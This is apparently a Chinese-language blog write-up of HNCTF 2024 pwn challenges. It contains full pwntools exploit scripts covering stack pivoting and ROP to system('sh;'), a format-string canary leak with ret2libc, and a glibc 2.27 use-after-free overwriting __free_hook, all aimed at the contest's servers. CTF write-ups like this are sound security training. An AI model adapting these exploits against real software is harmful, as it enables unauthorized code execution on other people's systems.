

nyyyddddn

nyyyddddn

hnctf_pwn



hnctf_pwn

ctf writeup

 2024/05/15   Share

• 
• 
• 
• 
• 

题目附件https://github.com/nyyyddddn/ctf/tree/main/hnctf_pwn

close

关闭了标准输出流，直接cat /flag 1>&0就可以了

ez_pwn

%s 泄露buf的地址后覆盖rbp栈迁移后打rop就好了，由于32位的调用约定，不能以连续的ret结尾的gadget去rop，然后system不能直接传binsh过去，得传;sh，所以read一次后重启main再调用system就好了

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "hnctf.imxbt.cn"
PORT = 29342

elf = context.binary = ELF('./pwn')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

ru("Welcome to H&NCTF, my friend. What's your name?")

payload = "A" * 0x2c
s(payload)
ru(payload)

leak = u32(r(4))
buf_addr = leak - (0xfff93748 - 0xfff93710)
success(f"buf_addr ->{hex(buf_addr)}")

read = elf.plt['read']
vuln = 0x08048639
bss = 0x804a000
system = 0x0804857D

payload = p32(read) + p32(vuln) + p32(0) + p32(bss) + p32(0x4)
payload = payload.ljust(0x2c,b'a') + p32(buf_addr - 4)
s(payload)


time.sleep(0.3)
# g(p)
s(b'sh;\0')

ru("Welcome to H&NCTF, my friend. What's your name?")
payload = "A" * 0x4
s(payload)
ru(payload)

buf_addr = buf_addr
success(hex(buf_addr))


buf_addr = buf_addr - (0xffb45f80 - 0xffb45f4c)


payload = p32(system) + p32(bss) + p32(bss)
payload = payload.ljust(0x2c,b'a') + p32(buf_addr - 4)

# g(p)
s(payload)

p.interactive()

idea

格式化字符串泄露canary后和ez_pwn一样的流程，不过libc小版本的差异远程打不通，可以用libc searcher解决这个问题

from pwn import *
from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "hnctf.imxbt.cn"
PORT = 46515

elf = context.binary = ELF('./idea')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])

p = connect()

sla("How many bytes do you want me to read? ","-1")

payload = b'%7$p'
# gdb_comm = '''
# b *0x080486E4
# c
# '''
# gdb.attach(p,gdb_comm)
sla("Ok, sounds good. I'll give u a gift!",payload)

rl()
canary = int(r(10),16)
success(hex(canary))

ru("bytes of data!")

puts = elf.plt['puts']
puts_got = elf.got['puts']
vuln = 0x0804870D

payload = b'a' * 0x20 + p32(canary) + b'a' * 0xc
payload += p32(puts) + p32(vuln) + p32(puts_got)
# g(p)
sl(payload)

ru("a" * 0x20)
rl()
# libc_base = u32(r(4)) - libc.sym['puts']
# success(f"libc_base ->{hex(libc_base)}")
# system = libc_base + libc.sym['system']
# binsh = libc_base + next(libc.search(b'/bin/sh'))
# read = libc_base + libc.sym['read']

bss = 0x804a000

puts_addr = u32(r(4))
success(hex(puts_addr))
success(hex(puts_addr))
libc = LibcSearcher("puts",puts_addr)
libc_base = puts_addr - libc.dump("puts")
success(hex(libc_base))
success(hex(libc_base))
system = libc_base + libc.dump("system")
read = libc_base + libc.dump("read")

sla("How many bytes do you want me to read? ","-1")
sla("Ok, sounds good. I'll give u a gift!","AA")
ru("bytes of data!")
payload = b'a' * 0x20 + p32(canary) + b'a' * 0xc
payload += p32(read) + p32(vuln) + p32(0) + p32(bss) + p32(0x4) 

sl(payload)

time.sleep(0.5)
s(b'sh;\0')

sla("How many bytes do you want me to read? ","-1")
sla("Ok, sounds good. I'll give u a gift!","AA")
ru("bytes of data!")
payload = b'a' * 0x20 + p32(canary) + b'a' * 0xc
payload += p32(system) + p32(bss) + p32(bss)
# g(p)
sl(payload)




p.interactive()

what

存在uaf，glibc 2.27 打 通过unsortedbin 泄露libc基地址后，打free hook为system然后去free一个binsh内容的堆块就好了

from pwn import *
# from LibcSearcher import *
import itertools
import ctypes

context(os='linux', arch='amd64', log_level='debug')

is_debug = 0
IP = "hnctf.imxbt.cn"
PORT = 40950

elf = context.binary = ELF('./what')
libc = elf.libc

def connect():
    return remote(IP, PORT) if not is_debug else process()

g = lambda x: gdb.attach(x)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
r = lambda x=None: p.recv() if x is None else p.recv(x)
rl = lambda: p.recvline()
ru = lambda x: p.recvuntil(x)
r_leak_libc_64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
r_leak_libc_32 = lambda: u32(p.recvuntil(b'\xf7')[-4:])


def add(size):
    sla("Enter your command:","1")
    sla("size:",str(size))

def delete():
    sla("Enter your command:","2")

def show(idx):
    sla("Enter your command:","3")
    sla("please enter idx:",str(idx))

def edit(idx,content):
    sla("Enter your command:","4")
    sla("please enter idx:",str(idx))
    sa("Please enter your content:",content)

p = connect()


for i in range(9):
    add(0x80)
for i in range(8):
    delete()
show(1)

ru("Content:")
leak = u64(r(6).ljust(8,b'\x00'))
success(hex(leak))
libc_base = leak - (0x72b6087ebca0 - 0x72b608400000) 
success(hex(libc_base))

free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']


edit(3,p64(free_hook))
add(0x80)
add(0x80)
add(0x80)

edit(3,p64(system))

edit(2,b'/bin/sh\x00\x00')

delete()
# g(p)


p.interactive()

Appetizers_🥕[working]

已经知道的信息是，能往libc基地址往后偏移任意位置 用异或的方式写两个字节的数据，写不到seccomp的段，还没有找到劫持控制流的方法，可能和main arena之类的宏观结构有关系？

Author：nyyyddddn

Link：https://nyyyddddn.github.io/2024/05/15/hnctf-pwn/

Publish date：May 15th 2024, 6:44:05 pm

Update date：September 5th 2024, 9:58:23 pm

License：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  ciscn_pwn
• Previous Post
  miniL2024_pwn

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. close
2. 2. ez_pwn
3. 3. idea
4. 4. what
5. 5. Appetizers_🥕[working]

• Archive
• Tag
• Cate

Total : 59

2024

• 10/23 geekgame2024
• 09/07 byuctf_iot
• 09/04 羊城杯2024pwn
• 09/02 gdbjail
• 08/31 nss3rd出题_Iterator_Trap解题思路
• 08/31 srctf_pwn出题
• 08/31 xyctf
• 08/25 羊城杯2023部分题目复现
• 08/22 奇奇怪怪格式化字符串漏洞的利用1
• 08/08 tfcctf2024
• 08/01 ImaginaryCTF
• 07/22 dasctf2024_summer_challenge
• 07/15 wkctf_pwn
• 06/30 d3ctf_pwnshell复现
• 06/25 xctf_ggbord复现
• 06/19 vsctf_pwn
• 06/04 litctf2024_pwn
• 05/30 xctf_BuggyAllocator复现
• 05/27 DragonKnightCTF_pwn
• 05/23 xv6_and_unix_utilities
• 05/22 ciscn_pwn
• 05/15 hnctf_pwn
• 05/14 miniL2024_pwn
• 04/28 中国海洋大学信息安全竞赛pwn方向wp
• 04/28 hznuctf
• 04/24 geekcon
• 03/31 尝试编译kernel和文件系统
• 03/27 nkctf_wp
• 03/15 CyberApocalypse_2024_Hacker_Royale_wp
• 03/10 pearlctf_wp
• 03/04 osu!gaming_CTF_2024
• 02/27 hgame2024week3_wp
• 02/25 sictfr3_pwn_wp
• 02/14 hgame2024week2_pwn_wp
• 02/14 nssr18_wp
• 02/11 0xl4ugh_pwn
• 02/07 hgame2024week1_wp
• 02/06 beginctf2024_wp
• 01/31 rw体验赛wp
• 01/26 nssctfr16_wp
• 01/24 春秋杯冬季赛wp
• 01/19 pwnable.tw
• 01/18 uoftctf_pwn_wp
• 01/04 pwnable.kr
• 01/02 cbctf

2023

• 12/28 GeekChallenge2023
• 12/28 Hackergame2023
• 12/28 newstar2023_week1
• 12/28 moectf_wp
• 11/29 isctf
• 11/05 newstar_week2
• 10/21 0xgame
• 09/26 exp本地不通远程通的问题
• 09/18 cdn绕过大全tips思路
• 09/18 cnss2023

Invalid date

• Invalid date Hello World

2023

• 09/18 php弱类型
• 09/18 python3-venv虚拟环境使用-解决包管理版本控制混乱的问题
• 09/18 sictf2023

 ctf writeup  misc



缺失模块，请参考主题文档进行安装配置：https://github.com/fi3ework/hexo-theme-archer#%E5%AE%89%E8%A3%85%E4%B8%BB%E9%A2%98

